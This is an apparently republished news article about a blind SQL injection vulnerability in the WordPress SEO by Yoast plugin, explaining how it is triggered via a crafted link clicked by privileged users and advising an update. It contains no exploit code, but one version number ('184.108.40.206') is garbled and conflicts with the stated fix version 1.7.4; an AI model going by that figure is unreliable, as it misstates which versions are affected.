Most of us are familiar with WordPress SEO by Yoast – one of the most popular plugins of the WordPress content management system (CMS). It is in fact the most downloaded plugin of WordPress as it facilitates easy optimization of websites for search engines.
But recently a serious vulnerability has been discovered in this plugin, due to which tens of millions of websites are at risk of being hacked by the attackers. It has been found that all the versions before 184.108.40.206 of WordPress SEO by Yoast are exposed to Blind SQL Injection (SQLi) web application flaw.
What is SQLi?
SQL injection is a code injection technique which is used to attack data-driven applications. Mostly known as attack vector for websites, SQLi is among the top 10 web application vulnerabilities.
Blind SQLi on the other hand is used when a web application is vulnerable to an SQL injection, but the results of the injection are not visible to the attacker. This type of attack is usually time-intensive as a new statement needs to be crafted for each bit which is recovered.
How does this SQLi work?
Usually in a SQLi attack, the attacker inserts a malformed SQL query into an application through a client-side input. But in case of WordPress SEO by Yoast, an outside hacker cannot trigger this vulnerability. The reason is that resides in the ‘admin/class-bulk-editor-list-table.php’ file, which is authorized to be accessed by WordPress Admin, Editor or Author privileged users only.
For this vulnerability to work, it is required to trigger the exploit from authorized users only. This can be done through social engineering, where an attacker can trick authorized user to click on a specially crafted payload exploitable URL.
Once the attack has been carried out, the attackers can easily their own admin account to the vulnerable WordPress site and do whatever fancies them.
But this does not mean that all those who have installed the plugin will be under the Blind SQLi attack. The attack as mentioned before can only be manually triggered either by a WordPress admin, author or editor who clicks the link created by the attacker.
Can this be fixed?
Of course you can fix this. All you need to do is update your plugin to the latest version – i.e. WordPress for SEO Yoast 1.7.4. The Yoast team has successfully patched the exploit, and even updated the Premium version of the plugin.
In case you have disabled the auto-update feature of your plugin, you need to take the following steps:
Manage > Plugins & Themes > Auto Updates Tab
This way you can update the plugin version and save your website from hackers attack. It is usually said that a WordPress website without the SEO for WordPress by Yoast is lacking an important feature. Thus it is advised that instead to uninstalling the plugin you can just upgrade it, as the vulnerability is very serious for website owners who aim to boost their search engine traffic with the help of this plugin.
Source: Search Engine Journal